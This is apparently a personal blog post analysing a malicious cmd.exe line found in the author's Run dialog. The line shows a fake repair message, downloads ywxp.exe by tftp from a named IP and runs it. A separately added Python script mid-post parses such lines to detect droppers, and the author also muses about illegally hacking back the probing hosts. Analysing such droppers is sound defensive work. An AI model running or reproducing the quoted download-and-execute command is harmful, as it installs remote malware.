ACK. I just lost everything I wrote 🙁
OK. Start again. Starting now…
Today I went on one of my computers and noticed an interesting error message: "unsupported parameter -i" (or something like this). This was not really a new message; I have seen it, and ignored it, many times. The message comes from something that randomly shows up in my Run dialog box:
"%comspec% /c echo Repairing user32.dll & echo Please wait… & tftp -i 75.8.46.128 GET ywxp.exe & start ywxp&"
I have not really taken a look at it before, so let's do that now.
%comspec% is an environment variable pointing to your command interpreter, cmd.exe (the 32-bit "DOS" prompt).
/c tells cmd.exe to execute the command(s) given on the command line and then exit.
The commands on the command line are "echo Repairing user32.dll & echo Please wait… & tftp -i 75.8.46.128 GET ywxp.exe & start ywxp&"
The & sign separates the different commands on the command line; cmd.exe runs them one after another, whether or not the previous one succeeded.
echo Repairing user32.dll & echo Please wait… simply prints the following on the screen:
Repairing user32.dll
Please wait…
tftp is a client program shipped with all NT/2000/XP (I am assuming) computers that downloads files from a remote TFTP server.
-i tells tftp to use binary (octet) mode, i.e. to transfer the file as-is without converting end-of-line characters.
75.8.46.128 is the IP address we are connecting to: adsl-75-8-46-128.dsl.applwi.sbcglobal.net. The server is located in Freedom, Wisconsin, near Appleton. They are connected using SBCGlobal and are on DSL, so nothing really fancy.
Note: the following addresses also show up in my history:
70.54.3.11 – bas4-kingston08-1177944843.dsl.bell.ca (Napanee, Bell Canada, Ontario)
68.213.254.139 – adsl-068-213-254-139.sip.mia.bellsouth.net (Miami, Florida, BellSouth)
GET indicates that we are downloading (rather than uploading) a file.
ywxp.exe is the file we are retrieving.
start ywxp runs the file we just downloaded (the .exe extension does not have to be given).
I have also gotten neml.exe and vtst.exe
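As an added example (not part of the original post), a small Python script that breaks a Run-dialog command line like the one above into its &-separated commands and reports the decoy echo messages, the tftp download and the file that is started afterwards. The sample line is the one quoted in this post (with a plain ASCII "..." in place of the ellipsis); the benign second line in the test is constructed.

```python
"""Triage a cmd.exe command line for the tftp download-then-execute pattern."""
import re

# Sample input: the command line observed on this page (ASCII "..." substituted).
OBSERVED = ('%comspec% /c echo Repairing user32.dll & echo Please wait... '
            '& tftp -i 75.8.46.128 GET ywxp.exe & start ywxp&')


def split_commands(line):
    """Strip the '%comspec% /c' prefix and split on cmd.exe's '&' separator."""
    body = re.sub(r'^\s*%comspec%\s+/c\s*', '', line, flags=re.IGNORECASE)
    return [c.strip() for c in body.split('&') if c.strip()]


def _base(name):
    """Normalise a program name so 'ywxp' and 'YWXP.EXE' compare equal."""
    return re.sub(r'\.exe$', '', name.lower())


def analyse(line):
    """Return what the chain echoes, downloads and starts, plus a verdict."""
    report = {'decoys': [], 'downloads': [], 'started': [], 'dropper': False}
    for cmd in split_commands(line):
        tokens = cmd.split()
        verb = tokens[0].lower()
        if verb == 'echo':
            # Text shown to the user while the download runs (here a fake "repair").
            report['decoys'].append(' '.join(tokens[1:]))
        elif verb == 'tftp':
            # tftp [-i] host GET|PUT source [destination]; -i means binary mode.
            args = [t for t in tokens[1:] if not t.startswith('-')]
            binary = '-i' in tokens[1:]
            if len(args) >= 3 and args[1].upper() == 'GET':
                report['downloads'].append(
                    {'host': args[0], 'file': args[2], 'binary': binary})
        elif verb == 'start':
            # Skip start's own switches such as /min; keep the program name.
            report['started'].extend(t for t in tokens[1:] if not t.startswith('/'))
    fetched = {_base(d['file']) for d in report['downloads']}
    launched = {_base(s) for s in report['started']}
    # Verdict: something fetched over tftp is executed in the same chain.
    report['dropper'] = bool(fetched & launched)
    return report


if __name__ == '__main__':
    print(analyse(OBSERVED))
```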
I have no idea what these programs do, and since I cannot connect to any of these addresses I may never know. 🙁 I want to download them and see what happens.
However, I am not completely sure how this gets onto my computer in the first place. Somehow something opens the Run dialog, types that in and tries to run it, but I am at a loss as to how.
I am currently in the process of doing scans on my system. I have done Ad-Aware and Spybot (WHO CARES ABOUT COOKIES?) and am currently doing an active scan by Panda Software. If nothing shows up, Trend Micro, and possibly AVG.
The system in question is a Windows NT 4.0 6a, so honestly, who cares if they get in. There is nothing for them to do if they are expecting XP.
Out of curiosity I checked the application logs on the computer to see what has been going on. One interesting thing keeps popping up.
Someone from Moose Jaw is making multiple attempts to connect to my computer.
204.83.254.106 – 204-83-254-106.msjw.hsdb.sasknet.sk.ca (Moose Jaw, Saskatchewan, SaskTel)
A bit earlier this month, someone from Korea, using the same program.
222.102.226.23 – Sunchon, Cholla-namdo, Korea, Korea Telecom.
And a bit earlier, someone in India, again with the same program.
59.145.150.155 – dsl-KK-static-155.150.145.59.airtelbroadband.in (Bangalore, Karnataka, India, Bharti Broadband – Scandent Solutions Corporation Limited)
Now, either a lot of people are trying to get into my system (strange and unlikely) or there are a lot of trojans or the like out there.
It should probably be noted that a lot of people in China seem to be interested in getting into my router.
Yeah, almost makes me want to do something illegal, like take over their computers or whatnot.
Still bothers me how someone managed to get far enough to try downloading stuff though.
If I feel energetic and can avoid being detected by people who disapprove of such things, I may attempt to find out more about these computers. I have however seen trojans that do similar things to this. At one hotel we have, a worm had installed itself and was spreading through a vulnerability in one of the versions of VNC that we used; we have since upgraded. The real purpose of the worm was unknown, but it was probably meant to give someone access to a lot of computers.
Ah whatever, I'll see what I can keep track of, monitoring audits and whatnot.
At least it gave me something to write about.